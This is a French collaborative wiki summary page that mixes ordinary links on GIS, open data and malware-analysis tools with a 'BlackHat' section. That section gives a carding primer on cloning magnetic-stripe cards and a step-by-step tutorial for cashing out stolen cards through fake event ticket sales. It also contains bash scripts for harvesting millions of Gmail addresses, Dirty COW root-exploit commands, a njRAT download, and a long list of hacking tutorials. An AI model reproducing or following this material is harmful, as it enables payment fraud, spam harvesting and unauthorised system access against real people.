Sommaire We make Hack
De Didaquest
Révision datée du 1 décembre 2023 à 08:39 par Admin (discussion | contributions) (Page créée avec « Category:Accueil Category:We make Hack {{Transclusion_Entete}} =Sommaire We make Hack= Les recherches collaboratives et travaux collaboratifs ouverts avec d'autre… »)
Le wiki : Accueil - Administrateur - Bureautique - Développeur - Intégrateur - Marketing - Multimédia - Objets numériques - Jeux - We make Hack
Le site : Accueil - Annuaire - Blog - Forum - Outils - Utilisateur
Le FTP : Consulter les fichiers partagés sur le FTP
Le Redmine : Consulter le Redmine
Sommaire We make Hack
Les recherches collaboratives et travaux collaboratifs ouverts avec d'autres personnes et communautés.
Méthodes agiles
L'esprit agile est-il en voie de disparaître ? Treize ans après la publication du manifeste agile, un développeur note l'échec des méthodes agiles. Source : https://www.developpez.com/actu/68946/L-esprit-agile-est-il-en-voie-de-disparaitre-13-ans-apres-la-publication-du-manifeste-agile-un-developpeur-note-l-echec-des-methodes-agiles/
Partager, améliorer et réutiliser les données publiques
Site officiel : https://www.data.gouv.fr/fr/
OpenCV
OpenCV.
Installer Slackware
The Slackware Linux Project. Site officiel : www.slackware.com Documentation officielle : docs.slackware.com Distribution Live : bear.alienbase.nl/mirrors/slackware/slackware-live/ Vos questions sur : www.linuxquestions.org/questions/slackware-14/
SIG et géolocalisation
ArcGIS logiciel SIG par Environmental Systems Research Institute
ArcGIS logiciel SIG par Environmental Systems Research Institute
Qgis
https://qgis.org/fr/site/
Outils de géolocalisation pour le web
1) GEOIP : une BDD externe qui jumelle ton IP a une région. 2) GOOGLE LOCATION : qui utilise un GPS pour identifier ta location spécifique et maintenant. 3) La géolocalisation HTML 5 : je ne connais pas sont fonctionnement pour identifier la géolocalisation.
Calculer des distances sur une carte de la route
Calculer des distances sur une carte de la route.
Openstreetmap
Les données brutes du projet OpenStreetMap sont accessibles à tous sous licence libre "ODbL". Cette liberté permet à chacun d’utiliser la base commune pour afficher un plan sur son site web ou pour tout autre usage personnalisé. Source : http://www.openstreetmap.fr
Données cartographiques complémentaires
Site de l’Institut Géographique National : http://www.ign.fr
Site de l'Institut National de la Statistique et des Études Économiques : http://www.insee.fr
Site du Bureau de Recherches Géologiques et Minières : http://www.brgm.fr
Portail d’accès aux données du BRGM : http://infoterre.brgm.fr
Site de société Intreatlas, spécialiste de la photographie aérienne : http://www.interatlas.fr
Alternatives à Google Map
Pour intégrer à un site internet : https://www.openstreetmap.org https://leafletjs.com
Pour effectuer une recherche : https://www.qwant.com/maps
BlackHat
Bypass un captcha
La communauté BitcoinBlackHat propose un solveur de captcha.
Carding
Les docks sont des appareils utilisés par les cardeurs pour cloner de vraies cartes bancaires pour ensuite utiliser des clones comme si on utilisait des cartes authentiques. Une carte clone est une duplication d'une vraie carte et peut être utilisée comme une vraie carte.
Le dump est une banque de données connectée à un compte bancaire et encodé sur la bande magnétique de la carte bancaire. Chaque carte est attachée à un compte bancaire.
La carte est le terminal qui permet au propriétaire d'un compte d'accéder au solde de son compte sans avoir à entrer dans une banque. Les cartes peuvent être utilisées avec ATM ou POS qui sont également des terminaux bancaires.
Si un hacker accède aux informations stockées dans la bande magnétique de la carte, il accède au compte carte du propriétaire et à l'argent économisé. Voler une décharge de carte n'est pas difficile. Les décharges peuvent être obtenues par écrémage, reniflement ou piratage. Chaque fois qu'une personne paie avec sa carte, elle assume le risque que les données de sa carte puissent être volées.
Les décharges bancaires ont normalement 3 pistes. Si l'une des 3 pistes est correcte et qu'il y a une quantité suffisante de fonds sur le compte, alors, la carte est bonne pour être utilisée et la transaction demandée peut être approuvée.
La piste 1
La piste 1 est la seule piste de la carte qui contient le nom du détenteur. Le cardeur utilise lapiste 1 pour changer le nom de la piste afin de correspondre aux faux identifiants qu'il possède ou avec le nom en relief sur le plastique. Cette piste est écrite avec un code connu sous le nom de parité impaire ou DEC SIXBIT.
La piste 2
La piste 2 est la piste développée par l'industrie bancaire et c'est la piste la plus intéressante pour un dump. Presque toutes les vidages fonctionneront si cette piste 2 est correcte. Il est écrit avec un schéma à 5 bits, 4 bits de données et 1 parité.
La piste 3
La piste 3 est pratiquement inutilisée par les principaux réseaux mondiaux. Elle a été développée par Thrift Saving Industry. Il semblerait que les points de ventes ne lisent pas cette piste.
Code de service
Le code de service de carte est un code de 3 chiffres présent dans la piste 1 et la piste 2. Chacun des 3 chiffres du code a une signification et lire ces chiffres ensemble comme un code de service nous permet de savoir où et comment la carte peut être utilisée.
Le premier chiffre
1 carte pour un usage international. 2 carte pour un usage international mais avec la puce. 5 carte pour un usage national. 6 carte pour un usage national mais avec la puce. 7 carte qui ne sont pas bonnes pour l'échange sauf pour les accords bilatéraux
Le deuxième chiffre
0 carte est normale, sans restriction. 2 émetteur doit être contacté via des moyens en ligne. 4 émetteur doit être contacté par des moyens en ligne, sauf en vertu d'accords bilatéraux.
Le troisième chiffre
0 pas de restriction mais le code PIN est requis. 1 pas de restrictions. 2 carte pouvant être utilisée pour le paiement des biens et services mais pas pour l'argent. Utilisation de 3-ATM seulement, le code PIN est requis 4 carte pour retirer des espèces uniquement. 5 carte pouvant être utilisée pour le paiement des biens et services, mais pas pour l'argent mais le code PIN est requis. 6 pas de restrictions, le code PIN doit être utilisé lorsque c'est faisable.
Ainsi, la bande magnétique de la carte ou / et la puce contiennent toutes les informations pour accéder et exploiter un compte bancaire connecté à cette carte. Si quelqu'un a copié une bande magnétique de carte, cette personne peut utiliser une machine appelée MSR, Magnetic Strip Reader-Writer et écrire les données de la carte sur une autre carte pour utiliser le clone comme carte authentique.
Si vous pensez qu'il est difficile de copier la bande magnétique sur une carte, sachez qu'un simple glissement vers un mini MSR ou un glissement de carte dans un point de vente compromis est tout ce dont les cardeurs ont besoin pour obtenir les données de la carte authentique et obtenir l'accès au compte des propriétaires de la carte. Il n'est donc pas si compliqué d'escroquer une cible à partir de sa carte bancaire dupliquée.
Source originale, en anglais : https://honeymoney24cc.com/dumpscash/
Exemple de technique employée pour faire un cashout
1 TUTO CASHOUT CC => IBAN OU PAYPAL Bonjour a toi cardeur, je vais t expliquer comment sortir de l argent de tes cc en cash. Tout d abord les prérequis : - Une CC fresh - Socks 5 + VPN - Un compte anonyme ou un Paypal anonyme également Le principe : Nous allons créer un événement sur un site (mariage, gala etc.), communiquer cet événement par mail pour remmener des gens sur notre page d achat de billets (sa c est pour passer discret) et ensuite commander gracieusement des places préventes, puis cashout.
2 1- Tout d abord, go sur le site : evenbrite.com, en haut a droite (en bleu) cliquer sur l onglet «créer un événement», rentrer votre adresse mail anon ainsi qu un mot de passe puis cliquer sur «ouvrir un compte». 2- La vous allez créer l événement Rentrer vos informations en fonction du nom de votre compte bancaire ou Paypal et blablater un peu, mettez un logo (sa fait toujours mieux) pour plus de professionnalisme, faite quelque chose de serieux, il faut vraiment que le site est l impression que vous allez faire votre évenement de l année. Pour finir mettez l adresse d une salle dans la ville ou vous allez faire votre prétendu évenement.
3 3- Créer les billets que vous allez ensuite carder Nom du billet : Mettez «Place», quantité et prix en fonction de ce que vous voulez sortir de votre cashout, ne perdez pas votre temps à mettre 5 places a 10, mais ne soyez pas trop gourmand non plus, personnellement je mets 40 places a 20 euros pièces, pour un cashout d environ 800. Sélectionnez l événement que vous voulez et le thème et cliquez sur «billets restants». Puis publiez votre événement. C est bon votre événement est finis, félicitation!
4 4- Maintenant nous allons aller dans «confirmer ses options de paiements» dans la page principale de votre événement. La rien de plus simple, dans «Mode de paiement» vous sélectionnez si vous souhaitez être payer par virement bancaire ou par Paypal. Selon le mode de paiement vous devrez rentrer vos numéros de RIB pour le virement ou les identifiants de votre compte Paypal. 5- Maintenant, et afin d être discret au niveau du site afin qu il enregistre des visiteurs pour l événement, nous allons aller dans la rubrique «inviter et promouvoir».
5 Et la il faut s'amuser à cliquer sur les liens qui redirige vers la page de l événement (chaque jour nous devons remmener des visiteurs) pour faire croire au site a un afflux de visiteurs (tous les jours je le rappelle, c est très important). Donc : - Cliquer pleins de fois sur «Assister a l événement» dans la rubrique «invitation mail» - Cliquez aussi plusieurs fois sur «liens de suivi» et copier coller le lien dans la barre de recherche plusieurs fois, il vous redirigera sur la page de l’événement Après sa vous allez dans graphique, et vous allez voire combien de «visiteurs» il y a eu sur votre événement dans la journée.
6 Le stratagème est la, dés que vous avez acquis assez de faux visiteurs vous pouvez carder allégrement les billets mis en ventes. Vous pouvez donc vous dirigez sur la page de paiement, évidemment pour aller à la page de paiement cliquez sur les liens de redirection, sa fait plus vrai. Je récapitule : Vous avez cliquez 30 ou 40 fois sur les liens de promotions et avez donc acquis 30 ou 40 visiteurs. Noté le lien de suivi sur votre bloc note. (le lien de suivi est le lien de redirection vers la page de votre événement pour les invités) Lancer votre VM, VPN et SOCKS 5, copier-coller le lien de suivi dans Google (pour faire croire a un acheteur qui a été invité) et achetez des tickets. Chaque jour de card doit se dérouler comme suit => Remmener des visiteurs puis carder.
7 Si vous avez fait dérouler votre événement dans 5 jours, remmener chaque jour une trentaine de visiteurs sur votre événement et carder 15 ou 20 billets en fonction du nombre de places et du prix de vente. La cerise sur le gâteau et de ne pas vendre tous les billets pour faire plus vrai. Après avoir cardé les billets toute la semaine, attendez que le site vous vire l argent, environ 5 jours après. Retirer l argent, et voila, vous avez votre première liasse de billets acquis au carding!
Source : https://docplayer.fr/2204699-Tuto-cashout-cc-iban-ou-paypal.html
Forum dédié au carding
De nombreux forums Blackhat dédiés au carding apporteront plus d'informations sur ce sujet. Carding Team : https://carding.team
Conclusion
On constate après quelques recherches que cette pratique reste potentiellement relativement simple à mettre en oeuvre. L'utilisation des appareils servant a créer des copies de cartes bancaires semble être réservé à un public autorisé. Le carding de cartes bancaires est interdit.
Hacker avec Javascript
Hacker avec Javascript.
IP Caméras - Mots de passe par défaut
https://ipvm.com/reports/ip-cameras-default-passwords-directory
Le Phishing
Phishing avec PHP.
Spam avec GMail
Une négligence de la part de Google découverte en 2011. En effet, il est possible de récupérer par le biais d'un sitemap l'ensemble des adresses des profils Google.
Celles-ci, bien que masquées par un ID, redirigent dans la plupart des cas, vers des adresses de la forme https://profiles.google.com/Zer00CooL ou Zer00CooL serait un pseudo utilisé avec Gmail
ce qui permet à n'importe qui d'en déduire l'adresse Gmail rattachée au profil consulté.
Voici une méthode avec des commandes bash pour récupérer l'ensemble des 35 millions d'adresses Gmail.
Cette méthode nécessite un espace disque de stockage important. Compter 20 Go ou plus pour être sur de pouvoir télécharger l'ensemble des données.
Pour commencer, on récupère le fameux sitemap de Google : mkdir google-urls-profile && cd google-urls-profile wget --quiet http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
On parse son contenu pour en extraire uniquement les URLs et on les télécharge : cat profiles-sitemap.xml | grep "<loc>" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' > list.txt for url in `grep http list.txt`; do wget --quiet $url; done;
Au final, on se retrouve avec de nombreux fichiers Sitemap. Les regrouper en un seul fichier : $ cat sitemap-*.txt > profile-urls.txt
La commande wc nous confirme que nous sommes bien en possession des 35 millions d'URLs pointant vers des profils Google. $ wc -l profile-urls.txt 35 442 725 profile-urls.txt
Si on inspecte leur contenu, les adresses sont de la forme suivante : https://profiles.google.com/1171359025719387936 https://profiles.google.com/1120069527109493321
Les données ne sont donc pas exploitables telles quelles, car le profil Google de chaque utilisateur est masqué par un ID (ex: 1171359025719387936) qui ne nous donne aucune indication. Mais cette adresse redirige, dans la plupart des cas, vers https://profiles.google.com/PSEUDOGMAIL. En fait, cela est vrai quand un utilisateur a activé le mode "user friendly" dans son compte. Nous allons être obligés de tester l'ensemble des 35 millions d'URLs ce qui prend pas mal de temps, pour récupérer l'adresse qui se cache derrière cette redirection. On peut le faire assez facilement avec ce script, nommé getmail.sh :
#!/bin/bash for url in `cat $1` do curl --silent --head $url | grep "^Location:" >> getmail.txt done
Appeller le script comme ça : chmod +x getmail.sh for file in `ls sitemap-*.txt`; do ./getmail.sh $file; rm -f $file; done;
L'avantage de cette méthode est la suivante : Si une adresse de profil ne possède pas de redirection, le champ "Location:" donné par la commande curl ne sera pas renseigné. Cela permet de filtrer uniquement les adresses avec un pseudo Gmail valide.
Une fois le traitement terminé, il ne nous reste plus qu'à rajouter "@gmail.com" à la fin de chaque pseudo, pour construire une liste valide : cat getmail.txt | awk -F'google.com/' '{print $2"@gmail.com"}'
Dans ce cas précis, cette méthode a permis de construire une liste de 15 000 adresses Gmail en moins d'une heure. Je me suis arrêté avant la fin, car je n'ai finalement aucun intérêt à collecter ce genre d'informations. N'importe qui peut utiliser cette méthode pour constituer une liste d'adresses mail et la revendre à des spammeurs par exemple.
Par Tux-planet, publié le 20 mai 2011 : http://www.tux-planet.fr/comment-recuperer-les-35-millions-dadresses-gmail/
Faille Cross-Site Scripting XSS
La faille XSS se situe côté client, le code malicieux est interprété par le navigateur de la victime. XSS Filter Evasion Cheat Sheet : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet Ressource complémentaire : https://fr.wikipedia.org/wiki/Cross-site_scripting Explication : http://venom630.free.fr/geo/tutz/securite_informatique/xss/
DNS Spoffing Attaque et contre attaque
RAT
RAT : Remote Administration Tool - Outil d'administration à distance.
Créer un rat en Python
Créer un rat en Python.
Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT
Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT le 2 Mars 2017 Téléchargement njRAT version officielle: https://www.up-4ever.com/jfhzoobp9wvx hack123
RAT - Informations complémentaires
Source : http://assiste.com.free.fr/p/abc/a/rat_remote_administration_tool.html
Social Recon
Social Recon - Trouver les informations liées à un mail ou un pseudo Social Recon - Osint Scraper : https://github.com/famavott/osint-scraper
Source : github.com/famavott/osint-scraper
Sous Debian Stretch et Kali Linux 2018 git clone github.com/famavott/osint-scraper.git cd osint-scraper
apt-cache policy python3 python3: Installé : 3.5.3-1
# Pour Kali Linux apt-get install python3-venv
# Pour Debian Stretch apt-get install python-pip apt-get install python3 apt-get install python3-pip
# En root # Create a virtual environment in python3 and activating it before you install the requirements. python3 -m venv ENV source ENV/bin/activate pip install -r requirements.txt pip install -e . pserve development.ini
Starting server in PID 2408. Serving on http://localhost:6543 Serving on http://localhost:6543
Une fois la machine redémarrée, relancer le service de la façon suivante : # Se placer dans le dossier de osint-scraper python3 -m venv ENV source ENV/bin/activate pserve development.ini
Avoir les privilèges de super utilisateur root sous GNU/Linux avec la faille Dirty Cow
Télécharger depuis Github un fichier zip (CVE-2016-5195) qui nous permettra d'exploiter la faille Dirty Cow. Source : https//github.com/gbonacini/CVE-2016-5195
cd Desktop cette ligne de commande est pour naviger vers le bureau cd CVE-2016-5195 cette ligne de commande est pour entrer dans le dossier CVE-2016-5195 id cette ligne de commande vous permettra de savoir que vous etes sous un simple compte utilisateur make la commande make sans arguments exécute la première règle du Makefile ./dcow cette ligne de commande est pour executer l'exploit de Durty Cow.
Après l’exécution de la dernière commande ./dcow , vous aurez pour résultat un mot de passe : "dirtyCowFun" qu'il faut saisir après la commande su après ça vous aurez les privilèges du super utilisateur.
Source : http://www.walidtech.com/2016/11/walidtech-hacking-linux-exploit.html
01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100
Challenge Cryptographie
1+3+3=7
Déchiffrer : 13m07d3p45533572341173
Leet Speak 1337 5p34k ou encore Leet Speak 1337 5|*34|< utilise des caractères et des symboles pour écrire d'une manière peu compréhensible pour un débutant afin de se différencier de lui. Le principe est d'écrire des caractères avec d'autres graphiquement proches.
Utiliser un outil pour lire ou écrire en Leet Speak : https://www.dcode.fr/leet-speak-1337
Résultat : IEmOTdEpASSEESTREAIITE La phrase est à convertir en minuscule, et permet alors de connaître le mot de passe.
Challenge Programmation
Renvoi
Challenge de Connexion Web avec Python.
Valider les challenges
Les solutions : http://01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100-solution.blogspot.com
Autres propositions de scripts pour avancer avec les challenges de 01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100. Le Github de Zer00CooL : https://github.com/ZerooCool/01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100
Warez
Final Fantasy 7.
Support utilisateur
Intégrer un service de support utilisateur avec Livezilla : https://www.livezilla.net/features/en/
Forcer le header d'une page avec PHP quand on ne peut pas le faire avec apache
Il est préférable de configurer les headers depuis le serveur web. Encoder les fichiers JS, CSS, en utilisant un script PHP qui se charge de renvoyer les fichiers compressés. Remplacer les appels aux fichiers JS et CSS habituels par des appels au script PHP suivi du nom de fichier en paramètres. Exemple de fichier gzip.php a utiliser avec un type de ressource via GET : gzip.php?f=style.css
Le fichier gzip.php : <?php ob_start('ob_gzhandler'); $file = isset($_GET['f']) ? $_GET['f'] : null; switch($file){ case 'style.css': header("Content-type: text/css"); include('style.css'); break; case 'ajax.js': header("Content-type: application/x-javascript\"); include('ajax.js'); break; }
Cyber Sécurité
Benoît Dupont - Chaire de recherche du Canada en Cybersécurité : https://www.benoitdupont.net
Hiren Boot CD - Supprimer le mot de passe d'une session Windows
Source : https://www.informatiweb.net/tutoriels/informatique/5-live-cd/114--hiren-boot-cd-supprimer-le-mot-de-passe-d-une-session-windows.html
Un équivalent nommé Kon Boot, mais, payant: https://www.piotrbania.com/all/kon-boot/
Oledump
oledump.py est un programme pour analyser les fichiers OLE (Compound File Binary Format). Ces fichiers contiennent des flux de données. oledump vous permet d'analyser ces flux. Source : https://blog.didierstevens.com/programs/oledump-py/
Oletools
Oletools : Outils python pour analyser les fichiers MS OLE2 (stockage structuré, format binaire de fichier composé) et les documents MS Office, pour l'analyse des logiciels malveillants, les analyses judiciaires et le débogage. Source : https://github.com/decalage2/oletools/
Sidejacking
Firesheep : le sidejacking pour les nuls. Firesheep, à sa sortie, a fait l’effet d’une bombe. Ce concept d’attaque permet assez facilement d’usurper l’identité de quelqu’un en ligne. C’était ultra-prévisible, et pourtant ça a mis des années à être mis au point : un logiciel qui mette à la portée de tous l’écoute et l’injection de cookies qui circulent sur un réseau local. Source : http://blog.celeri.net/firesheep-ou-le-sidejacking-a-portee-de-tous/ Télécharger : http://codebutler.github.io/firesheep/
SniffPass
SniffPass est un petit logiciel de surveillance des mots de passe qui écoute votre réseau, enregistre les mots de passe qui transitent par votre adaptateur réseau et les affiche instantanément à l'écran. SniffPass peut capturer les mots de passe des protocoles suivants: POP3, IMAP4, SMTP, FTP et HTTP (Mots de passe d'authentification non sécurisée.). Vous pouvez utiliser cet utilitaire pour récupérer les mots de passe Web / FTP / Email perdus. Source : http://www.nirsoft.net/utils/password_sniffer.html
ViperMonkey
Un analyseur et un moteur d'émulation VBA pour analyser les macros malveillantes. Source : https://github.com/decalage2/ViperMonkey/
De nombreux exemples d'attaques informatiques
Hack à distance de Windows 10 PC en utilisant TheFatRat Hack Drupal site Web en utilisant Drupal Module RESTWS code PHP à distance Exécution Configuration du pare-feu Pentest Lab avec pfsense dans VMware Configuration du serveur proxy Lab en utilisant Wingate (Partie 2) Test de pénétration Wifi dans le PC à distance (Partie 1) Configuration du serveur proxy Lab en utilisant Wingate (Partie 1) Comment installer Cloud Computing Penetration Testing Lab Pare-feu de pénétration dans Remote PC de Windows (Partie 3) Test d'intrusion dans Windows Server Active Directory en utilisant Metasploit (Partie 1) Capturez VNC session de Remote PC Windows en Payloads Injection Rassemblez des titres de compétences de WebNMS Framework Server en utilisant Metasploit Hack PC Windows à distance à l'aide de macros avec Msfvenom Test de pénétration du pare-feu dans Remote PC de Windows (Partie 2) Test de pénétration du pare-feu dans Remote PC de Windows (Partie 1) Hack serveur Web utilisant Tiki Wiki Fichier Unauthenticated Upload Vulnérabilité Hack PC à distance en utilisant malveillants Documents MS Office Hack serveur Web à l'aide d'injection de commandes PHP (Smplshllctrlr) Exploit serveur distant en utilisant Tiki Wiki CMS Command Execution Calendrier Hack Remote PC Windows en utilisant Regsvr32.exe (.sct) Application Whitelisting Bypass serveur Hack Wifi utilisant Evil Twin Method avec Linset dans kali Linux Attaque OpenSSH utilisateur Enumeration Time-Based avec Osueta Hack Mot de passe en utilisant Rogue Wi-Fi Access Point Attack (WiFi-Citrouille) Test de pénétration Wifi en utilisant Gerix Wifi Cracker Hack PC à distance à l'aide de fichiers Microsoft Office (Les Payloads Macro) Hack Verrouillé Workstation Mot de passe en texte clair Test de pénétration dans Windows / Active Directory avec Crackmapexec Hack Démêler NG Firewall en utilisant la vulnérabilité commande d'injection Comment détecter Sniffer sur votre réseau 3 façons de Crack Wifi en utilisant Pyrit, oclHashcat et Cowpatty Crack Wifi Mot de passe en utilisant Aircrack-Ng (Guide du débutant) Hack ne importe quel téléphone Android avec DroidJack (Guide du débutant) 5 façons de Surf Internet Anonymously dans Android Phone Exploit Linux PC utilisant IPFire Bash Environnement Injection Variable (Shellshock) Tutorial RAT HTTP pour les débutants 5 façons de créer Backdoor Permanent PC à distance Exploitation dans le pare-feu Linux utilisant IPFire proxy.cgi RCE Détecter Hacker en réseau utilisant Android Phone Cracking WiFi Mot de passe en utilisant Fern WIFi Cracker Hack Wi-Fi en utilisant l'ingénierie sociale avec Fluxion (Evil Twin Attack) Réseau sans fil Hack utilisant Airgeddon Comment faire pour créer Botnet D-Dos Attaque avec UFONet Automatiser exploitation de PC à distance en utilisant Metasploithelper Hack PC à distance en utilisant BrowserBackdoor - JavaScript WebSocket Backdoor Exploiter Injection de commandes OS Web Application utilisant Commix Hack votre réseau grâce à Android Phone en utilisant cSploit Bypass All Antivirus et Hack à distance de Windows 10 PC en utilisant Hercules Hack PC à distance avec Reverse PowerShell en utilisant Brosec Test de pénétration dans WordPress site Web en utilisant WordPress Exploit Framework Hacking WordPress en utilisant Ninja Forms Unauthenticated File Upload Hack WordPress Server en utilisant WordPress SlideShow Gallery assermentée File Upload Hack Gmail et Facebook Mot de passe dans le réseau en utilisant Bettercap Les touches rémanentes d'accès backdoor sur le PC à distance avec les touches rémanentes Hunter Exploit PC à distance en utilisant Advantech WebAccess Dashboard Viewer télécharger Common Image arbitraire File Upload Hack PC à distance de Windows en utilisant Dell SonicWALL Scrutinizer 11.01 methodDetail Injection SQL Hack à distance de Windows 10 PC en utilisant Cypher (Ajout d'Shellcode à PE fichiers) Détecter Vulnerability Scanner en réseau à l'aide KFSensor Test de pénétration de serveur Web avec DVWA et Metasploit (Guide Débutant) Comment identifier Réseau vulnérabilités en utilisant Nessus (Guide Débutant) Détecter Hacker en réseau en utilisant KFSensor Honeypot Hack Windows Server en réseau à l'aide Atelier Web Remote Command Hack Drupal Site Server à l'aide de Drupal HTTP Paramètre Key / Value Injection SQL Hack serveur distant en utilisant WordPress Plugin Foxypress de code arbitraire Exécution Collecte de l'information en utilisant Maltego (Guide Débutant) Numérisation de vulnérabilité dans le réseau à l'aide Retina Hack serveur Web utilisant ATutor 2.2.1 Injection SQL / Remote exécution de code Hack serveur Web utilisant PHP Utility Belt à distance l'exécution de code Hack serveur Web utilisant Joomla Header HTTP Unauthenticated Exécution de code à distance Weeman - Serveur HTTP pour Phishing Configuration du pare-feu Pentest Lab en utilisant Effacer OS Hack PC à distance de Windows utilisant Office OLE DLL multiples vulnérabilités de chargement latéral Hack serveur Web utilisant WordPress WP EasyCart Unrestricted File Upload Exploit serveur Web utilisant WordPress Infusionsoft Upload Vulnérabilité Exploit serveur Web utilisant WordPress WPtouch Authenticated File Upload Exploit serveur Web utilisant WordPress Galerie photo Unrestricted File Upload Hack serveur Web utilisant WordPress Work Flow Upload Vulnérabilité Hack serveur Web utilisant WordPress Ajax Charger plus PHP Upload Vulnérabilité Hack serveur Web utilisant WordPress Reflex Gallery Upload Vulnérabilité Hack serveur Web utilisant WordPress Site Web N-Media Formulaire de contact avec File Upload Vulnérabilité Hack à distance Linux PC en utilisant PHPFilemanager 0.9.8 à distance l'exécution de code Numérisation de vulnérabilité dans WordPress site utilisant WPScan Configuration Pentest Lab pour Windows Server Environment (Guide Débutant) Hack Remote PC Windows en utilisant Pcman FTP Server Buffer Overflow - Commande PUT Hack Remote PC Windows en utilisant le partage de fichiers facile HTTP Server 7.2 SEH Overflow Rassemblez Browser et information OS de PC à distance en utilisant Http client Exploit Hack à distance de Windows 10 Mot de passe en texte brut en utilisant WDigest Credential Caching Exploit Trouver vulnérabilité dans EasyCafe Server en utilisant Metasploit Hack WhatsApp de personne à travers le code QR (travail) Trouver vulnérabilité dans Server / Client utilisant Nmap Hack Fond d'écran de téléphone Android à distance en utilisant Metasploit Hack des journaux d'appels, SMS, Caméra de téléphone Android à distance en utilisant Metasploit Hack à distance de Windows 10 PC en utilisant JSRAT Web Setup Pentest Lab utilisant bWAPP dans Windows 10 DOS Attaque dans le réseau en utilisant Colasoft Packet Builder (Guide Débutant) Navigateur de configuration Framework Basé pour les tests de pénétration Web dans Kali Linux (Mantra Toolkit) Configuration Web Penetration Testing Lab utilisant Framework Mth3l3m3nt OWASP Configuration du Lab de pénétration Web en utilisant WebGoat dans kali Linux Hack à distance de Windows 10 PC en utilisant ARCANUS (Bypass All Antivirus) Web Setup Pentest Lab utilisant Cassé Applications Web (Guide Débutant) Exploit de Windows 10 PC en utilisant msfven.sh Script Web Setup Hacking Lab utilisant DVNA Kali Linux Web configuration Pentest Lab pour les débutants en utilisant DVWS Comment vyos Setup (Virtual Router Pentest Lab) 3 façons de pirater Telnet passsword de PC à distance Wifi Investigation Forensic utilisant Wifihistoryview Web Setup Penetest Lab pour les débutants utilisant DVWA et OWASP Mutillidae II Hack à distance de Windows 10 PC à l'aide Discover Tool Hack à distance Linux PC à l'aide de fichiers PHP 5 façons de pirater le service FTP sur PC à distance 2 façons de pirater le Bureau à distance Mot de passe en utilisant kali Linux Numérisation réseau en utilisant NMAP (Guide Débutant) Comment configurer Démêler pare-feu pour la sécurité du réseau (Guide Débutant) 4 façons de pirater service SSH sur PC à distance Exploit à distance de Windows PC en utilisant PSploitGen Hack à distance de Windows 10 PC en utilisant psmsf Hack PC à distance en utilisant DarkComet RAT avec Metasploit Exploit Windows PC à distance en utilisant HTA Attaque avec Net Tools Trouver le routeur vulnérable sur Internet en utilisant RouterhunterBR 2 façons de pirater de Windows 10 Mot de passe Easy Way Exploit à distance de Windows PC en utilisant ps1encodeTool 3 façons de capturer Mot de passe HTTP dans le réseau PC Denial of Service Attack sur le réseau PC en utilisant SET Toolkit Hack PC à distance avec nettool MitM pentesting Toolkit Hack Gmail ou Facebook Mot de passe de PC à distance en utilisant NetRipper Exploitation Outil Exploitation de Windows PC en utilisant Venom: Shellcode Générateur Hack PC à distance avec fichier PHP en utilisant cadre PHPSploit Furtif Post-Exploitation Hack Windows PC à distance avec VNC clavier de code à distance Exécution Hack Remote PC Windows ou Linux en utilisant MPC Privilege Escalation sur Windows 7,8,10, Server 2008, Server 2012 à l'aide de pommes de terre Hack Windows 7 Mot de passe du compte invité en utilisant 2015-1701 Exploit (Easy Way) Hack à distance Windows, Linux PC et téléphone Android en utilisant Msfvenom Winpayloads: Indétectable de Windows Payload Generation SimplyEmail: Email Recon Tools (Email Footprinting) Killchain: Une collection de puissants outils de piratage Comment faire pour créer un dossier illimité Victim Remote PC en utilisant Metasploit Comment l'accès non autorisé sur PC à distance en utilisant Metasploit Comment recueillir des informations de Antivirus en Victim Remote PC en utilisant Metasploit Hack PC à distance de Windows en utilisant ManageEngine OpManager à distance l'exécution de code Hack Remote PC de Windows Gérer Desktop Engine Central 9 File Upload Servlet Connection Id Vulnérabilité Hack Gmail et Facebook de PC à distance en utilisant Spoofing DNS et SET Toolkit Hack PC à distance avec HTA Attack dans SET Toolkit Wifi Hacking avec Evil Twin Attaque en utilisant Linset Hack mot de passe Windows en texte clair en utilisant Mimikatz et informations d'identification de Windows Editor Détournement de session en utilisant Ettercap, Hamster et Ferret (A Guide Débutant) Hack PC à distance en utilisant WinRAR SFX code à distance la vulnérabilité d'exécution Hack Remote PC Windows en utilisant l'usine de Backdoor avec Metasploit Hack PC à distance en utilisant Faux Scam Mises à jour avec Ettercap et Metasploit Hacking avec Empire - PowerShell Post-Exploitation Agent Hack Remote PC Windows en utilisant Script Web Livraison Comment Hack de Windows Fond d'écran de PC à distance Hack Android Phone WhatsApp et tous les répertoires à l'aide de Mercury Navigateur Vulnérabilité Hack PC à distance avec filigrane Master Buffer Overflow (SEH) Hack PC à distance en utilisant Pupy - Outil d'administration à distance Comment afficher tous les Exploits possibles dans Victim PC utilisant Windows Exploit-Suggester Hack Windows Remote PC en utilisant PDF Shaper Buffer Overflow Hack Remote PC Windows en utilisant l'utilitaire FTP Konica Minolta 1,00 Poster Auth CWD Commande SEH Overflow Hack PC à distance de Windows en utilisant MS15-100 Microsoft Windows Media Center MCL Vulnérabilité Comment Hack sessions sauvegardées dans Putty en utilisant Metasploit Hack PC à distance en utilisant Firefox PDF.js Privileged Javascript Injection Windows 7 Post Key Hack Attack en utilisant Metasploit Hack PC à distance de Windows en utilisant la vidéo Charge studio Buffer Overflow (de SEH) Magie Unicorn - PowerShell Downgrade Attaque et outil de l'exploitation Hack PC Windows ou Linux en utilisant ByteArray Adobe Flash Player Utilisation Après gratuit Hack PC Windows ou Linux en utilisant Adobe Flash fond opaque Utilisation Après gratuit Comment Rassemblez WIFI mot de passe dans Windows PC à distance Bypass Antivirus et Hack Remote PC Windows avec un abri Hack PC à distance en utilisant Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow Hack PC à distance de Windows en utilisant Adobe Flash Player Dessin Remplissez Shader corruption de mémoire Hack Browsers, chat, bases de données, Mails, Wifi passe à distance PC Windows ou Linux Hack Remote PC Windows en utilisant Windows Client Copier l'image win32k Exploit Hack du mot de passe en texte brut du PC à distance de Windows Mot de passe Hack enregistrées dans Windows et Linux PC utilisant LaZagne Project Hack PC à distance de Windows en utilisant Adobe Flash Player ShaderJob Buffer Overflow Hack PC à distance de Windows en utilisant Adobe Flash Player domainMemory ByteArray 